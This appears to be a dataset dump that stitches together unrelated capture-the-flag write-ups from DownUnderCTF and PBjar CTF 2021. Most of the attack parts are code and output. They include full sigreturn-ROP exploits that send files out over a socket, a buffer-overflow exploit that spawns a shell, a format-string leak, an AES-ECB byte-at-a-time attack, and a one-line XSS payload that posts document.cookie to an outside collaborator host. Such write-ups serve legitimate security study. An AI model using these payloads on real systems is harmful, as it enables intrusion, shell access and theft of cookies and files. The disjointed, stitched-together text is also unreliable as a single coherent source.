text_chunk
stringlengths 151
703k
|
---|
## ImDeGhost
> Points: ?>> Solves: 4
### Description:Are you afraid of ghosts? Warning: The flag is not the usual "flag.txt" file. Instead, it is in a file with a name format of a length 16 binary string of 0's and 1's in the current directory. An example of this format is "0101010110101010". Connect with "nc 143.198.127.103 42007".
Author: Rythm
### Attachments:```imdeghost.zip```
## Analysis:
When I checked with the author after the competition, my solution was not an assumed solution, but I was able to solve it in a simpler way than the assumed solution.
Regarding the shellcode challenge caused by ROP, the system calls of `mmap, mprotect, execve, remap_file_pages, execveat, and pkey_mprotect` were prohibited by seccomp.
```$ seccomp-tools dump ./imdeghost line CODE JT JF K================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x0a 0xc000003e if (A != ARCH_X86_64) goto 0012 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x07 0xffffffff if (A != 0xffffffff) goto 0012 0005: 0x15 0x06 0x00 0x00000009 if (A == mmap) goto 0012 0006: 0x15 0x05 0x00 0x0000000a if (A == mprotect) goto 0012 0007: 0x15 0x04 0x00 0x0000003b if (A == execve) goto 0012 0008: 0x15 0x03 0x00 0x000000d8 if (A == remap_file_pages) goto 0012 0009: 0x15 0x02 0x00 0x00000142 if (A == execveat) goto 0012 0010: 0x15 0x01 0x00 0x00000149 if (A == pkey_mprotect) goto 0012 0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0012: 0x06 0x00 0x00 0x00000000 return KILL```The code execution area is `0x133700000000` and the stack area is `0x6900000000`.
Since you can only enter the stack area, we need to write shellcode only with ROP.
Since the PIE address cannot be obtained, only the following instructions of `0x133700000000` can be used with the ROP gadget.For this reason, ROP gadgets that pop to registers such as `pop rdi; ret` could not be used.
```=> 0x133700000000: mov r15,rdi 0x133700000003: xor rax,rax 0x133700000006: xor rbx,rbx 0x133700000009: xor rcx,rcx 0x13370000000c: xor rdx,rdx 0x13370000000f: xor rdi,rdi 0x133700000012: xor rsi,rsi 0x133700000015: xor rbp,rbp 0x133700000018: xor r8,r8 0x13370000001b: xor r9,r9 0x13370000001e: xor r10,r10 0x133700000021: xor r11,r11 0x133700000024: xor r12,r12 0x133700000027: xor r13,r13 0x13370000002a: xor r14,r14 0x13370000002d: movabs rsp,0x6900000000 0x133700000037: mov r14,0x3 0x13370000003e: dec r14 0x133700000041: mov rdi,r14 0x133700000044: mov rax,0x3 0x13370000004b: syscall <= Mainly used ROP gadget 0x13370000004d: test r14,r14 0x133700000050: jne 0x13370000003e 0x133700000052: mov rax,r15 0x133700000055: ret ```
Also, since the standard input, standard output, and standard error output are closed at the end of the above code, the flag cannot be output to the standard output.
Furthermore, the file name of the flag is a file name such as `0101010110101010`, so I had to get the file name somehow first.
## Solution:
The ROP gadgets available are limited, but I've found that I can call any system call using the ROP gadgets below.
In order to call any system call, I need to set an arbitrary value in the r15 register, but the 256 remainder of the first input size goes into r15.``` 0x13370000004b: syscall 0x13370000004d: test r14,r14 0x133700000050: jne 0x13370000003e 0x133700000052: mov rax,r15 0x133700000055: ret```
I used `sys_rt_sigreturn (15)` as a way to set the value in each register.`sys_rt_sigreturn (15)` can be read from the stack and set to all registers.
By calling the system calls in the following order while using `sys_rt_sigreturn (15)`, the file name could be output to the local environment.
```- sys_open("./", 0, 0x200000)- sys_getdents(0, mem+0xb00, 0x300)- sys_socket(2, 1, 6)- sys_connect(1, mem+0xe80, 0x10)- sys_write(1, mem+0xb00, 0x300)```
The file name was `0101111001001101`.
Similarly, by calling the system calls in the following order, the flags could be output to the local environment.
```- sys_open("./", 0, 0x200000)- sys_read(0, mem+0xb00, 0x300)- sys_socket(2, 1, 6)- sys_connect(1, mem+0xe80, 0x10)- sys_write(1, mem+0xb00, 0x300)```
The assumed solution is to open `/proc/self/mem` and write the execution code directly in the area of `0x133700000000` using `sys_pwrite64 (18)` without using `sys_getdents (78)`.See below for details.https://github.com/pbjar/Challenges/blob/main/Pwn/imdeghost/imdeghost.py
Thanks to Rythm for the interesting challenges and post-competition supports.
## Exploit code:Python code to get the file name (If you get it from the server, you need to set NAT etc on your router.)```pythonfrom pwn import *
context(os='linux', arch='amd64')#context.log_level = 'debug'
BINARY = './imdeghost'elf = ELF(BINARY)
if len(sys.argv) > 1 and sys.argv[1] == 'r': HOST = "143.198.127.103" PORT = 42007 s = remote(HOST, PORT) ip_addr = 0xbe409f76 else: s = process(BINARY) libc = elf.libc ip_addr = 0x0100007f # 127.0.0.1
s.recvuntil("for you will not be seeing it again.\n")
mem = 0x6900000000syscall_ret = 0x13370000004b # syscall; test r14,r14; jne 0x13370000003e; mov rax,r15; ret
def Sigreturn(rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp, rip, r8, r9, r10, r11, r12, r13, r14, r15): buf = p64(0)*5 buf += p64(r8) + p64(r9) + p64(r10) + p64(r11) + p64(r12) + p64(r13) + p64(r14) + p64(r15) buf += p64(rdi) + p64(rsi) + p64(rbp) + p64(rbx) + p64(rdx) + p64(rax) + p64(rcx) + p64(rsp) + p64(rip) buf += p64(0) + p64(0x33) + b"AAAAAAAA"*4 + p64(0) return buf
mem = 0x6900000000
buf = p64(syscall_ret)# sys_open("./", 0, 0x200000)buf += Sigreturn(2, 0, 0, 0x200000, 0, mem + 0xe00, mem + 0x170, mem + 0xf0, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
# sys_getdents(0, mem+0xb00, 0x300)buf += Sigreturn(78, 0, 0, 0x300, mem + 0xb00, 0, mem + 0x170, mem + 0xf0*2, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
# sys_socket(2, 1, 6)buf += Sigreturn(0x29, 0, 0, 6, 1, 2, mem + 0x170, mem + 0xf0*3, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
# sys_connect(1, mem+0xe80, 0x10)buf += Sigreturn(0x2a, 0, 0, 0x10, mem + 0xe80, 1, mem + 0x170, mem + 0xf0*4, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
# sys_write(1, mem+0xb00, 0x300)buf += Sigreturn(1, 0, 0, 0x300, mem + 0xb00, 1, mem + 0x170, mem + 0xf0*5, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
buf += b"A"*(0xe00-len(buf))buf += b"./\x00"buf += b"A"*(0xe80-len(buf))buf += p32(0x55550002) + p32(ip_addr)buf += b"A"*(0xf00+15-len(buf))#pause()s.send(buf)
s.interactive()```
Python code to get the flag file (If you get it from the server, you need to set NAT etc on your router.)```pythonfrom pwn import *
context(os='linux', arch='amd64')#context.log_level = 'debug'
BINARY = './imdeghost'elf = ELF(BINARY)
if len(sys.argv) > 1 and sys.argv[1] == 'r': HOST = "143.198.127.103" PORT = 42007 s = remote(HOST, PORT) ip_addr = 0xbe409f76 else: s = process(BINARY) libc = elf.libc ip_addr = 0x0100007f # 127.0.0.1
s.recvuntil("for you will not be seeing it again.\n")
mem = 0x6900000000syscall_ret = 0x13370000004b # syscall; test r14,r14; jne 0x13370000003e; mov rax,r15; ret
def Sigreturn(rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp, rip, r8, r9, r10, r11, r12, r13, r14, r15): buf = p64(0)*5 buf += p64(r8) + p64(r9) + p64(r10) + p64(r11) + p64(r12) + p64(r13) + p64(r14) + p64(r15) buf += p64(rdi) + p64(rsi) + p64(rbp) + p64(rbx) + p64(rdx) + p64(rax) + p64(rcx) + p64(rsp) + p64(rip) buf += p64(0) + p64(0x33) + b"AAAAAAAA"*4 + p64(0) return buf
buf = p64(syscall_ret)# sys_open("./0101111001001101\", 0, 0)buf += Sigreturn(2, 0, 0, 0, 0, mem + 0xe00, mem + 0x170, mem + 0xf0, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
# sys_read(0, mem+0xb00, 0x300)buf += Sigreturn(0, 0, 0, 0x300, mem + 0xb00, 0, mem + 0x170, mem + 0xf0*2, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
# sys_socket(2, 1, 6)buf += Sigreturn(0x29, 0, 0, 6, 1, 2, mem + 0x170, mem + 0xf0*3, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
# sys_connect(1, mem+0xe80, 0x10)buf += Sigreturn(0x2a, 0, 0, 0x10, mem + 0xe80, 1, mem + 0x170, mem + 0xf0*4, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
# sys_write(1, mem + 0xb00, 0x300)buf += Sigreturn(1, 0, 0, 0x300, mem + 0xb00, 1, mem + 0x170, mem + 0xf0*5, syscall_ret, 0x100a, 0x100b, 0x100c, 0x100d, 0x100e, 0x100f, 0, 0xf)buf += p64(syscall_ret)
buf += b"A"*(0xe00-len(buf))buf += b"./0101111001001101\x00"buf += b"A"*(0xe80-len(buf))buf += p32(0x55550002) + p32(ip_addr)buf += b"A"*(0xf00+15-len(buf))#pause()s.send(buf)
s.interactive()```
## Results:```bashmito@ubuntu:~/CTF/PBjar_CTF_2021/Pwn_ImDeGhost/imdeghost$ python3 solve_filename.py r[*] '/home/mito/CTF/PBjar_CTF_2021/Pwn_ImDeGhost/imdeghost/imdeghost' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled[+] Opening connection to 143.198.127.103 on port 42007: Done[*] Switching to interactive modeBoo.
mito@ubuntu:~/Desktop$ nc -lp 21845...dockerenvAN(0101111001001101AAAAAA...```
```bashmito@ubuntu:~/CTF/PBjar_CTF_2021/Pwn_ImDeGhost/imdeghost$ python3 solve_flag.py r[*] '/home/mito/CTF/PBjar_CTF_2021/Pwn_ImDeGhost/imdeghost/imdeghost' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled[+] Opening connection to 143.198.127.103 on port 42007: Done[*] Switching to interactive modeBoo.
mito@ubuntu:~/Desktop$ nc -lp 21845flag{aAaaaaAaaAAaAAAAaAAaAAAAaaAaaaaA}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...```
## Reference:
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
https://inaz2.hatenablog.com/entry/2014/07/30/021123 |
```import telnetlib
class Telnet:
def __init__(self, host, port): # self.tn = telnetlib.Telnet("pwn-2021.duc.tf", "31905") self.tn = telnetlib.Telnet(host, port)
def read(self, has_quiz): data = "" while len(data) == 0: data = self.tn.read_very_eager() data = data.decode().strip() if has_quiz: quiz = data[data.index(": ") + 2:] print(f"{data} ==> _{quiz}_") return quiz else: print(data) return data
def write(self, bin_text): print("+ answer ==> ", end="") print(bin_text)
self.tn.write(bin_text) self.tn.write(b"\n")
def read(tn): data = "" while len(data) == 0: data = tn.read_very_eager() data = data.decode() print(data) return data
telnet = Telnet("pwn-2021.duc.tf", "31905")telnet.read(False)telnet.write(b"")
telnet.read(False)telnet.write(b"2")
# decode hex string and provide numberquiz = telnet.read(True)answer = str(int(quiz, 16)).encode("ascii")telnet.write(answer)
# decode hex string and provide ASCII leterquiz = telnet.read(True)answer = chr(int(quiz, 16)).encode("ascii")telnet.write(answer)
# url decode this string and provide ascii symbolsfrom urllib.parse import unquote_plusquiz = telnet.read(True)answer = unquote_plus(quiz).encode("ascii")telnet.write(answer)
# base64 decode and provide plaintextfrom base64 import b64decodequiz = telnet.read(True)answer = b64decode(quiz)telnet.write(answer)
# Encode this plaintext string and provide me the Base64from base64 import b64encodequiz = telnet.read(True)answer = b64encode(quiz.encode("ascii"))telnet.write(answer)
# Decode this rot13 string and provide me the plaintextdef rot13_decrypt(cipher): ascii = "abcdefghijklmnopqrstuvwxyz_" rot13 = "nopqrstuvwxyzabcdefghijklm_" return "".join([ascii[rot13.index(letter)] for letter in cipher])
quiz = telnet.read(True)answer = rot13_decrypt(quiz)telnet.write(answer.encode())
# Encode this plaintext string and provide me the ROT13 equilaventdef rot13_encrypt(text): ascii = "abcdefghijklmnopqrstuvwxyz_" rot13 = "nopqrstuvwxyzabcdefghijklm_" return "".join([rot13[ascii.index(letter)] for letter in text])
quiz = telnet.read(True)answer = rot13_encrypt(quiz)telnet.write(answer.encode())
# Decode this binary string and provide me the original number (base 10)quiz = telnet.read(True)answer = str(int(quiz, 2)).encode()telnet.write(answer)
# Encode this number and provide me the binary equivalentquiz = telnet.read(True)answer = bin(int(quiz))telnet.write(answer.encode())
# Final Question, what is the best CTF competition in the universequiz = telnet.read(False)telnet.write(b"DUCTF")
telnet.read(False)``` |
# **DownUnderCTF 2021**
<div align="center"> </div>
***
# Table of Contents* [Miscellaneous](#miscellaneous) * [Discord](#discord) * [The Introduction](#the-introduction) * [Twitter](#twitter) * [General Skills Quiz](#general-skills-quiz) * [rabbit](#rabbit) * [Floormat](#floormat)* [Cryptography](#cryptography) * [Substitution Cipher I](#substitution-cipher-i) * [Substitution Cipher II](#substitution-cipher-ii) * [Break Me!](#break-me) * [treasure](#treasure)* [Reversing](#reversing) * [no strings](#no-strings)***
# Miscellaneous
## DiscordHow about you visit our help page? You know what they say when you need 'help' discord is there for support :)
**Author:** Crem
**Solution**
The flag is in the `#request-support` channel on the [CTF discord channel](https://discord.gg/vXtuGXy)
**Flag**
**`DUCTF{if_you_are_having_challenge_issues_come_here_pls}`**
## The IntroductionAre you ready to start your journey?
**Author:** Crem
`nc pwn-2021.duc.tf 31906`
**Solution**
With the challenge we're given a command to run, this command (`nc`) connects to a server identified with the domain pwn-2021.duc.tf and interacts with a service running on port `31906`, running it returns the following question from the server:
```wh47 15 y0ur n4m3 h4ck3r?```
Entering a name will starts printing the hacker manifesto, this is an essay written in the 80s by "The Mentor" after his arrest and is considered a major piece of the hacker culture, the full essay is linked below and worth a read if you consider yourself part of the hacking community.
After printing the essay, the following line is written:```50 4r3 y0u 4c7u4lly 4 h4ck3r?```Answering yes will return you the flag (other answers might also work as I didn't check):
```W3rni0, y0u w1ll n33d 7h15 0n y0ur duc7f j0urn3y 7h3n
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DUCTF{w3lc0m3_70_7h3_duc7f_7hund3rd0m3_h4ck3r}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__ / \--..____ \ \ \-----,,,.. \ \ \ \--,,.. \ \ \ \ ,' \ \ \ \ ``.. \ \ \ \-'' \ \ \__,,--''' \ \ \. \ \ ,/ \ \__..- \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \```
**Flag** **`DUCTF{w3lc0m3_70_7h3_duc7f_7hund3rd0m3_h4ck3r}`**
**Refereces**
* [The Hacker Manifesto](http://phrack.org/issues/7/3.html)
## TwitterIf you have been paying attention to our Twitter, we have been using flags in the background of our graphics this year. However, one of these flags stands out a bit more than the rest! Can you find it?
While you're there, why don't you give us a follow to keep up to date with DownUnderCTF!
**Author:** Crem
**Solution**
This one is pretty guessy but the solution is written in the description so I guess I can't complain, this year the CTF graphics used flags from the previous competition, as can be seen here:
<div align="center"> </div>
But one of the graphics posted two weeks before the competition included the flag in a brighter color, try finding it in the image:
<div align="center"> </div>
(hint - look down)
**Flag**
**`DUCTF{EYES_ON_THE_PRIZES}`**
## General Skills QuizQUIZ TIME! Just answer the questions. Pretty easy right?
**Author:** Crem
`nc pwn-2021.duc.tf 31905`
**Solution**
This challenge requires you to decode and encode using different popular formats such as base64, binary and ROT13. Not enough time is given to do those manually, so I ended up writing the following python script that interacts with the server and performs the conversions (the tasks required are commented):```pythonfrom pwn import *from urllib.parse import unquotefrom base64 import b64decode, b64encodefrom codecs import encode,decode
s = remote('pwn-2021.duc.tf', 31905)
# Ready to starts.sendline()# 1+1=?s.recvuntil(': ')s.sendline('2')# Decode an hex string to decimals.recvuntil(': ')s.sendline(str(int(s.recvline(),16)))# Decode an hex string to ASCII letters.recvuntil(': ')s.sendline(str(chr(int(s.recvline(),16))))# Decode a URL encoded strings.recvuntil(': ')s.sendline(unquote(s.recvline(keepends=False).decode()))# Base64 decodes.recvuntil(': ')s.sendline(b64decode(s.recvline()))# Base64 encodes.recvuntil(': ')s.sendline(b64encode(s.recvline(keepends=False)))# ROT13 decodes.recvuntil(': ')s.sendline(decode(s.recvline(keepends=False).decode(), 'rot_13'))# ROT13 encodes.recvuntil(': ')s.sendline(encode(s.recvline(keepends=False).decode(), 'rot_13'))# Binary decodes.recvuntil(': ')s.sendline(str(int(s.recvline(),2)))# Binary encodes.recvuntil(': ')s.sendline(bin(int(s.recvline())))# Best CTF competitions.recvuntil('?')# s.sendline('picoCTF')s.sendline('DUCTF')s.interactive()```I'll add a description for each encoding used later on, after doing all those tasks we're given the flag:```Bloody Ripper! Here is the grand prize!
.^. (( )) |#|_______________________________ |#||##############################| |#||##############################| |#||##############################| |#||##############################| |#||########DOWNUNDERCTF##########| |#||########(DUCTF 2021)##########| |#||##############################| |#||##############################| |#||##############################| |#||##############################| |#|'------------------------------' |#| |#| |#| |#| |#| |#| |#| |#| |#| |#| |#| |#| DUCTF{you_aced_the_quiz!_have_a_gold_star_champion} |#| |#| |#| //|\\```**Flag**
**`DUCTF{you_aced_the_quiz!_have_a_gold_star_champion}`**
## rabbitCan you find Babushka's missing vodka? It's buried pretty deep, like 1000 steps, deep.
**Author:** Crem + z3kxTa
[flag.txt](challenges//flag.txt)
**Solution**
This type of challenge is really common and I've covered a variation of it before in [my writeup for TJCTF 2020](https://github.com/W3rni0/TJCTF_2020#zipped-up).
With the challenge we're given a file falsely named `flag.txt`, this file is actually a compressed file of either `bzip2`, `zip`, `gzip` or `xz` format. And, as the description for the challenge suggests, it contains another compressed file of the same type and so on. decompressing each file manually is possible but will require a lot of work, so we can automate the process by scripting.
For that I wrote the following bash script that for each file in the working directory checks its type, and if it of one of the above compression file formats, the script extract the content of the file and removes it. This process terminates only when there aren't any compressed files in the directory:
```bash#!/bin/bashget_flag() { for filename in $(pwd)/*; do echo "$filename" if [[ $(file --mime-type -b "$filename") == "application/x-bzip2" ]] then bunzip2 "$filename" rm "$filename" get_flag return elif [[ $(file --mime-type -b "$filename") == "application/zip" ]] then mv $filename flag.zip unzip flag.zip rm flag.zip get_flag return elif [[ $(file --mime-type -b "$filename") == "application/x-xz" ]] then mv $filename flag.xz unxz -f flag.xz rm flag.xz get_flag return elif [[ $(file --mime-type -b "$filename") == "application/gzip" ]] then mv $filename flag.gz gunzip flag.gz rm flag.gz get_flag return else cat "$filename" return fi done}
get_flag```
And by letting the script run for a while I got a text file containing the following string:```RFVDVEZ7YmFidXNoa2FzX3YwZGthX3dhc19oM3IzfQ==```I inferred by the symbols in the string that this is a base64 encoded message, and decoding it from base64 using [CyberChef](https://gchq.github.io/CyberChef/) I got the flag:
<div align="center"> </div>
**Flag**
**`DUCTF{babushkas_v0dka_was_h3r3}`**
## FloormatI've opened a new store that provides free furnishings and floormats. If you know the secret format we might also be able to give you flags...
**Author:** todo#7331
`nc pwn-2021.duc.tf 31903`
[floormat.py](challenges//floormat.py)
**Solution**
The function str.format() is used to replace a string we control with an object, which gives us access to object's attributes, one of them is a dictionary of global variables in the init of the object, which contains the flag:```pythonfrom pwn import *
s = remote('pwn-2021.duc.tf', 31903)# Ask for a custom formats.sendline("my l33t format")# Send Payloads.sendline("{f.__init__.__globals__[FLAG]}")s.sendline("F")# Ask for one of the furnishing (not important which)s.sendline("flutter")s.interactive()```**Flag**
**`DUCTF{fenomenal_flags_from_funky_formats_ffffff}`**
***
# Cryptography
## Substitution Cipher IJust a simple substitution cipher to get started...
**Author:** joseph#8210
[substitution-cipher-i.sage](challenges//substitution-cipher-i.sage) | [output.txt](challenges//output_i.txt)
**Solution**
The encryption is known and works letter by letter, thus we can find the encryption of each letter and use that to inverse the ciphertext:```pythonfrom string import printable
def encrypt(msg, f): return [chr(f.substitute(c)) for c in msg]
def decrypt(enc, f): subtitution_table = encrypt(printable.encode('utf-8'), f) return ''.join(printable[subtitution_table.index(c)] for c in enc)
P.<x> = PolynomialRing(ZZ)f = 13*x^2 + 3*x + 7
enc = open('./output.txt', 'r').read().strip()FLAG = decrypt(enc, f)print(FLAG)```**Flag**
**`DUCTF{sh0uld'v3_us3d_r0t_13}`**
## Substitution Cipher IIThat's an interesting looking substitution cipher...
**Author:** joseph#8210
[substitution-cipher-ii.sage](challenges//substitution-cipher-ii.sage) | [output.txt](challenges//output_ii.txt)
**Solution**
Similar to the previous challenge, only difference is that we need to find the polynomial now, we can do that by knowing that the flag starts with '`DUCTF{`' and ends with '`}`', and use lagrange interpolation to find the polynomial:
```pythonfrom string import ascii_lowercase, digits, printableCHARSET = "DUCTF{}_!?'" + ascii_lowercase + digitsn = len(CHARSET)
def encrypt(msg, f): ct = '' for c in msg: ct += CHARSET[f.substitute(CHARSET.index(c))] return ct
def decrypt(enc, f): subtitution_table = encrypt(CHARSET, f) return ''.join(CHARSET[subtitution_table.index(c)] for c in enc)
P.<x> = PolynomialRing(GF(n))enc = open('./output.txt', 'r').read().strip()
X = [0, 1, 2, 3, 4, 5, 6]Y = [CHARSET.index(c) for c in enc[:6]] + [CHARSET.index(enc[-1])]points = zip(X,Y)f = P.lagrange_polynomial(points)
FLAG = decrypt(enc,f)print(FLAG)```**Flag**
**`DUCTF{go0d_0l'_l4gr4fg3}`**
## Break Me!AES encryption challenge.
**Author:** 2keebs
`nc pwn-2021.duc.tf 31914`
[aes-ecb.py](challenges//aes-ecb.py)
**Solution**
AES-ECB one byte at a time attack, I covered it before in my writeup for [H@cktivityCon CTF 2020](https://github.com/W3rni0/HacktivityCon_CTF_2020#a-e-s-t-h-e-t-i-c):
```pythonfrom pwn import *import refrom string import printablefrom Crypto.Cipher import AESfrom base64 import b64decode
# Part 1 - Retrieving the keys = remote('pwn-2021.duc.tf', 31914)s.recvuntil(":")key = '' # !_SECRETSOURCE_!
for i in range(len(key) + 1,16): s.sendline('a' * (16 - i)) base_block = re.findall('[A-Za-z0-9+\/=]{64}', s.recvuntil(":").decode('utf-8'))[0] print(base_block) for c in printable: s.sendline('a' * (16 - i) + key + c) block = re.findall('[A-Za-z0-9+\/=]{64}', s.recvuntil(":").decode('utf-8'))[0] if block == base_block: key = key + c print(key) break
s.close()
# Part 2 - Getting the flags = remote('pwn-2021.duc.tf', 31914)s.sendlineafter(':\n', ' ' * 16)ct = b64decode(s.recvuntil("\n").decode().strip())cipher = AES.new(key.encode(), AES.MODE_ECB)pt = cipher.decrypt(ct)print(pt)
```
**Flag**
**`DUCTF{ECB_M0DE_K3YP4D_D474_L34k}`**
## treasureYou and two friends have spent the past year playing an ARG that promises valuable treasures to the first team to find three secret shares scattered around the world. At long last, you have found all three and are ready to combine the shares to figure out where the treasure is. Of course, being the greedy individual you are, you plan to use your cryptography skills to deceive your friends into thinking that the treasure is in the middle of no where...
**Author:** joseph#8210
`nc pwn-2021.duc.tf 31901`
[treasure.py](challenges//treasure.py)
**Solution**
We can easily retrieve the secret by first sending 1 as our share, which means that the assumed secret is only the product of the other two shares raised to the power of two, and using our own share we can calculate the secret similarly to the way the combiner does that.
Using the secret and the fake_coords we will calculate the 3rd root of the division between them, and create a new share which is the product of the real share and the result, this will guarantee that the result of the combiner is `secret * fake_secret / secret = fake_secret` and so the result is the fake coordinates, and we can safely use our real coordinates, I wrote the following sage script to perform all of those calculation and interact with the server:```python
from Crypto.Util.number import long_to_bytesfrom pwn import *from gmpy2 import iroot
FAKE_COORDS = 5754622710042474278449745314387128858128432138153608237186776198754180710586599008803960884p = 13318541149847924181059947781626944578116183244453569385428199356433634355570023190293317369383937332224209312035684840187128538690152423242800697049469987K = GF(p)
s = remote('pwn-2021.duc.tf', 31901)share = int(s.recvline().split(b' ')[-1])s.sendlineafter(': ', '1')product = int(s.recvline().split(b' ')[-1])REAL_COORDS = pow(share, 3, p) * product % p
FAKE_DIV_REAL = K(FAKE_COORDS) / K(REAL_COORDS)FAKE_DIV_REAL_ROOT = FAKE_DIV_REAL.nth_root(3) new_share = share * FAKE_DIV_REAL_ROOT
s.sendlineafter(': ', str(new_share))s.sendlineafter(': ', str(REAL_COORDS))s.interactive()```
**Flag**
**`DUCTF{m4yb3_th3_r34L_tr34sur3_w4s_th3_fr13nDs_w3_m4d3_al0ng_Th3_W4y.......}`**
***
# Reversing
## no stringsThis binary contains a free flag. No strings attached, seriously!
**Author:** joseph#8210
[nostrings](challenges//nostrings)
**Solution**
With the challenge we're given an ELF binary file, running it prompt us to give the flag:
<div align="center"> </div>
So this is a flag checker, we can look at the disassembly to try and understand how it works, for disassembly in this challenge I used IDA free. The first thing that pops while looking at the disassemly is the main function:
<div align="center"> </div>
Even without looking at the instructions themselves we can figure out that it is looping over something, presumably our input, at further inspection we can see that is does just that while comparing each letter to a string it has in it's data section (annotated to make it more understandable):
<div align="center"> </div>
And we can get the full flag from the data section:
<div align="center"> </div>
The reason that strings don't normally will pick up this flag is because it is encoded with 16-bit where strings uses 7-bit (ASCII) by default, we can choose another encoding using the `-e` flag:
<div align="center"> </div>
**Flag**
**`DUCTF{stringent_strings_string}`** |
[Original writeup](https://github.com/dystobic/writeups/tree/main/2021/DownUnderCTF/Leaking%20like%20a%20sieve) https://github.com/dystobic/writeups/tree/main/2021/DownUnderCTF/Leaking%20like%20a%20sieve |
[Original writeup](https://github.com/dystobic/writeups/tree/main/2021/DownUnderCTF/Substitution%20Cipher%20I) https://github.com/dystobic/writeups/tree/main/2021/DownUnderCTF/Substitution%20Cipher%20I |
My XSS payload for chainreaction, using unicoded less/greater-than + whitelistd event:
```a10asd"><body onpageshow="fetch('https://xxxx.burpcollaborator.net', {method: 'POST',mode: 'no-cors',body:document.cookie});"> ``` |
___# deadcode_(pwn, beginner, 100 points, 528 solves)_
I'm developing this new application in C, I've setup some code for the new features but it's not (a)live yet.
Author: xXl33t_h@x0rXx
`nc pwn-2021.duc.tf 31916`
[deadcode](./deadcode)___
## Investigation`checksec` showed that besides NX no other stack mitigations are present. Following the `ltrace` I learned the relatively simple flow of the program and found apotential buffer overflow vulnerability because the insecure `gets` functions is used to capture user input. I loaded the program into `gdb` and disassembledthe `main` function, which is the only one as `info functions` showed.
```...0x00000000004011c7 <+50>: lea rax,[rbp-0x20]0x00000000004011cb <+54>: mov rdi,rax0x00000000004011ce <+57>: mov eax,0x00x00000000004011d3 <+62>: call 0x401060 <gets@plt>0x00000000004011d8 <+67>: mov eax,0xdeadc0de0x00000000004011dd <+72>: cmp QWORD PTR [rbp-0x8],rax0x00000000004011e1 <+76>: jne 0x401200 <main+107>...0x00000000004011ef <+90>: lea rdi,[rip+0xed5] # 0x4020cb "/bin/sh"0x00000000004011f6 <+97>: mov eax,0x00x00000000004011fb <+102>: call 0x401050 <system@plt>...```We can see here that whatever resides at `rbp-0x8` is compared to `0xdeadc0de` and if equals, `system("/bin/sh")` is executed. So the goal is to overflowthe buffer at `rbp-0x20` and write `0xdeadc0de` to `rbp-0x8` - which initially is set to `0` - to spawn us a shell. Let's set a breakpoint right before the compare and run the programwith `AAAAAAAA` as input.
```(gdb) r...Breakpoint 1, 0x00000000004011d8 in main ()(gdb) x/8x $rbp-0x200x7fffffffdec0: 0x41414141 0x41414141 0x00401000 0x000000000x7fffffffded0: 0xffffdfd0 0x00007fff 0x00000000 0x00000000(gdb) p $rbp-0x8$3 = (void *) 0x7fffffffded8```
So we have to overwrite the contents of address `0x7fffffffded8` (thats's where `rbp-0x8` points to). The `AAAAAAAA`'s we typed in were sent straight to the buffer at`0x7fffffffdec0` (that's where `rbp-0x20` points to) as we can see by the eight `0x41`'s (ASCII value for 'A'). From here we learn we have to fill the bufferwith 24 bytes and then get to write `0xdeadc0de` to our target address.
## SolutionLet's pull off a quick ruby exploit for proof of concept.
```(gdb) r <<< $(ruby -e 'print "A"*24 + "\xde\xc0\xad\xde"')...Breakpoint 1, 0x00000000004011d8 in main ()(gdb) x/8x $rbp-0x200x7fffffffdec0: 0x41414141 0x41414141 0x41414141 0x414141410x7fffffffded0: 0x41414141 0x41414141 0xdeadc0de 0x00000000(gdb) x/x $rbp-0x80x7fffffffded8: 0xdeadc0de(gdb) cContinuing.
Maybe this code isn't so dead...```
... and we've successfully overflowed the buffer satisfying the compare to get our shell. From here we can just execute `cat flag.txt`to get the flag.
See [exploit](./exploit.py) for an automation of the exploit written in python.
> DUCTF{y0u_br0ught_m3_b4ck_t0_l1f3_mn423kcv}
|
 [flag.txt](https://github.com/Rookie441/CTF/files/7231190/flag.txt)
> Run file command on Linux, we see that flag.txt is a bzip2 compressed data.

> Proceed to try to decompress...

> Seems like there are many embedded files. Moreover, it is not limited to bzip2 data. There are also zip files.

> Intended solution involves writing a script as shown [here](https://github.com/DownUnderCTF/Challenges_2021_Public/tree/main/misc/rabbit). However, we will be doing it manually using [7zip](https://www.7-zip.org/download.html).
> These are the steps:
```1. Rename file extention from .txt to .zip2. 7zip->Open Archive3. Ctrl+PgDn for about a minute until reach the end.4. Open last flag file --> RFVDVEZ7YmFidXNoa2FzX3YwZGthX3dhc19oM3IzfQ==5. Base64 decode --> DUCTF{babushkas_v0dka_was_h3r3}```
